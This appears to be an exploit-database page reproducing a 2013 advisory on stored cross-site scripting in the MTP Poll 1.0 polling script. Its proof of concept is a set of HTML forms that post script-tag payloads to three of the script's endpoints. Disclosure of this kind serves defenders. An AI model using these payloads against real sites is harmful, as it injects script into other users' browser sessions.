header-logo
Suggest Exploit
vendor:
More than poll
by:
Gjoko 'LiquidWorm' Krstic
7,5
CVSS
HIGH
Stored Cross-Site Scripting
79
CWE
Product Name: More than poll
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:morephp.net:more_than_poll:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux, Apache2
2013

MTP Poll 1.0 Multiple Remote Script Insertion Vulnerabilities

MTP Poll script suffers from multiple stored cross-site scripting vulnerabilities. The issues are triggered when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to dynamically generate web pages.
Source

Exploit-DB raw data:

<!--

MTP Poll 1.0 Multiple Remote Script Insertion Vulnerabilities


Vendor: MTP Scripts
Product web page: http://www.morephp.net
Affected version: 1.0

Summary: More than poll is a polling system with a powerful
administration tool. It features: multiple pools, templates,
unlimited options, IP Logging, cookie support, and more.

Desc: MTP Poll script suffers from multiple stored cross-site scripting
vulnerabilities. The issues are triggered when input passed via several
parameters to several scripts is not properly sanitized before being returned
to the user. This can be exploited to execute arbitrary HTML and script code
in a user's browser session in context of an affected site.

Tested on: Linux, Apache2


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2013-5132
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5132.php


17.02.2013

-->

<html>
<head>
<title>MTP Poll 1.0 Multiple Remote Script Insertion Vulnerabilities</title>
</head>
<body><center>
<form method="POST" action="http://localhost/poll_script/poll_add.php">
<input type="hidden" name="question" value='"><script>alert(1);</script>' />
<input type="hidden" name="color[]" value="#8bc6e1" />
<input type="hidden" name="answer[]" value='"><script>alert(2);</script>' />
<input type="hidden" name="img[]" value="" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="cat" value="0" />
<input type="hidden" name="action" value="add" />
<input type="submit" value="XSS #1" />
</form>
<br /><br />
<form method="POST" action="http://localhost/poll_script/insert_user.php">
<input type="hidden" name="ins_city" value='"><script>alert(3);</script>' />
<input type="hidden" name="ins_country" value="MK" />
<input type="hidden" name="ins_email" value="lab@zeroscience.mk" />
<input type="hidden" name="ins_fname" value='"><script>alert(4);</script>' />
<input type="hidden" name="ins_pass" value="thricerpass" />
<input type="hidden" name="ins_username" value="thricer" />
<input type="submit" value="XSS #2" />
</form>
<br /><br />
<form method="POST" action="http://localhost/poll_script/ajax_cat_ins.php">
<input type="hidden" name="name" value='"><script>alert(5);</script>' />
<input type="submit" value="XSS #3" />
</form>
</center></body>
</html>